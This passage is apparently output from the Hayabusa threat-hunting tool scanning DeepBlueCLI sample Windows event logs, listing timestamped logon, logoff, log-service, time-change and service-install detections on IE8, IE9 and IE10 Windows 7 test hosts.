0x2b7f0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:51:44.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:52:38.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xcf564,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf564 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf598 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xcf598,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:36:37.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:38:21.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27008,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27008 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27038 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27038,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:50:17.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:51:19.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x12048,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12048 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12070 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x12070,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 08:03:47.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 02:34:56.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x131c3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x131c3 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x13216 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x13216,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 02:42:44.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 02:43:34.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x36aed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36aed | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36b1d | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x36b1d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 03:16:14.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 03:17:05.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x11c02,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c02 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c32 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x11c32,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 03:30:40.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 08:21:47.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x170f5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x170f5 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x17125 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 08:23:13.147 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TP AutoConnect Service | Path: ""C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:23:13.240 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TP VC Gateway Service | Path: ""C:\Program Files\VMware\VMware Tools\TPVCGateway.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:23:19.075 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware VMCI Bus Driver | Path: system32\DRIVERS\vmci.sys | Account: | Start Type: boot start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:23:30.884 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Memory Module Driver | Path: system32\DRIVERS\pnpmem.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:23:31.757 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: vSockets Driver | Path: C:\Windows\system32\drivers\vsock.sys | Account: | Start Type: boot start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:23:33.349 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Host Guest Client Redirector | Path: system32\drivers\vmhgfs.sys | Account: | Start Type: system start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:11.865 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft 1.1 UAA Function Driver for High Definition Audio Service | Path: system32\drivers\HdAudio.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:17.909 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Clock Proxy | Path: system32\drivers\MSPCLOCK.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:18.237 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Quality Manager Proxy | Path: system32\drivers\MSPQM.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:19.969 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Service Proxy | Path: system32\drivers\MSKSSRV.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:20.281 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Tee/Sink-to-Sink Converter | Path: system32\drivers\MSTEE.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:20.452 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware USB Pointing Device | Path: system32\DRIVERS\vmusbmouse.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:23.245 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Trusted Audio Drivers | Path: system32\drivers\drmkaud.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:30.249 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Radio USB Driver | Path: System32\Drivers\BTHUSB.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:31.310 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Port Driver | Path: System32\Drivers\BTHport.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:33.925 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Request Block Driver | Path: system32\DRIVERS\BthEnum.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:34.362 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Device (RFCOMM Protocol TDI) | Path: system32\DRIVERS\rfcomm.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:36.015 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Device (Personal Area Network) | Path: system32\DRIVERS\bthpan.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:38.153 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Pointing Device | Path: system32\DRIVERS\vmmouse.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:38.823 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Memory Control Driver | Path: C:\Program Files\Common Files\VMware\Drivers\memctl\vmmemctl.sys | Account: | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:39.011 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Vista Physical Disk Helper | Path: C:\Program Files\VMware\VMware Tools\vmrawdsk.sys | Account: | Start Type: system start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:41.647 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: vm3dmp | Path: system32\DRIVERS\vm3dmp.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:44.783 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: VMware Tools | Path: ""C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:24:53.788 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Snapshot Provider | Path: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Account: NT AUTHORITY\LocalService | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x17125,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-27 08:25:05.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,info,,Logon Type 0 - 